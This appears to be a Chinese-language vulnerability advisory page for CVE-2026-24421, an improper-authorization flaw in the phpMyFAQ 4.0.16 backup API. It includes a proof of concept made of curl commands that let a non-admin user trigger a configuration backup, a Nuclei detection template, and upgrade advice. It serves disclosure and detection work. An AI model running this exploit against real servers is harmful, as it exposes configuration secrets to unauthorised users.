漏洞分析

[webapps] phpMyFAQ 4.0.16 - Improper Authorization

AiRedTeam

06 May 2026 • 阅读时间 2 分钟

CVE-2026-24421

漏洞

High · CVSS N/A

📋 漏洞基础信息

CVE	CVE-2026-24421
漏洞类型	`漏洞`
受影响版本	详见原文
危害等级	High · CVSS N/A
发布日期	2026-04-29
提交者	GUIA BRAHIM FOUAD
来源	Exploit-DB 原文 ↗

⚔️ 原始 PoC

# Exploit Author: GUIA BRAHIM FOUAD
## Summary
Authenticated non-admin users can call /api/setup/backup and trigger a configuration backup. The endpoint checks authentication but does not enforce authorization (missing configuration/admin permission check), and returns a link/path to the generated ZIP.
## Details
SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged-in user to create a sensitive backup and retrieve its path.
## PoC
Precondition: API enabled, any authenticated non-admin user.
1) Log in as a non-admin user:
curl -c /tmp/pmf_api_cookies.txt \
-H 'Content-Type: application/json' \
-d '{"username":"tester","password":"Test1234!"}' \
http://192.168.40.16/phpmyfaq/api/v3.0/login
2) Trigger backup generation:
curl -i -b /tmp/pmf_api_cookies.txt \
-X POST --data '4.0.16' \
http://192.168.40.16/phpmyfaq/api/setup/backup
## Expected Result
The API responds successfully and includes a link/path to the generated ZIP backup even though the caller is not an admin / does not have configuration-edit permissions.
## Impact
Low-privileged users can generate sensitive backups. If the ZIP is web-accessible (server misconfiguration), this can lead to exposure of secrets/configuration and facilitate follow-on compromise.
## References
- GitHub Advisory: GHSA-wm8h-26fv-mg7g

🔍 Nuclei Detection 模板

以下为漏洞探测模板，用于判断目标是否受影响：

id: CVE-2026-24421-detection

info:
  name: phpMyFAQ <= 4.0.16 - Detection
  author: glitr
  severity: high
  description: |
    Detects phpMyFAQ instances that are potentially vulnerable to CVE-2026-24421
    (Improper Authorization in backup API endpoint).
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"phpMyFAQ"
  tags: cve,cve2026,phpmyfaq,detection

http:
  - method: GET
    path:
      - "{{BaseURL}}/phpmyfaq/api/index.php"
      - "{{BaseURL}}/api/index.php"
      - "{{BaseURL}}/phpmyfaq/"
      - "{{BaseURL}}/"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: regex
        part: body
        regex:
          - 'phpMyFAQ[\s]*([0-9]+\.[0-9]+\.[0-9]+)'
          - '"version":"([0-9]+\.[0-9]+\.[0-9]+)"'
      - type: dsl
        dsl:
          - "compare_versions(version, '<= 4.0.16')"

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'phpMyFAQ[\s]*([0-9]+\.[0-9]+\.[0-9]+)'
          - '"version":"([0-9]+\.[0-9]+\.[0-9]+)"'

🛡️ 修复建议

请升级到厂商最新安全版本。

📎 参考链接

Exploit-DB 原文

⚠️ 本文基于公开漏洞数据库，仅供安全研究与防御参考。生成时间: 2026-05-07 07:14 | 来源: Exploit-DB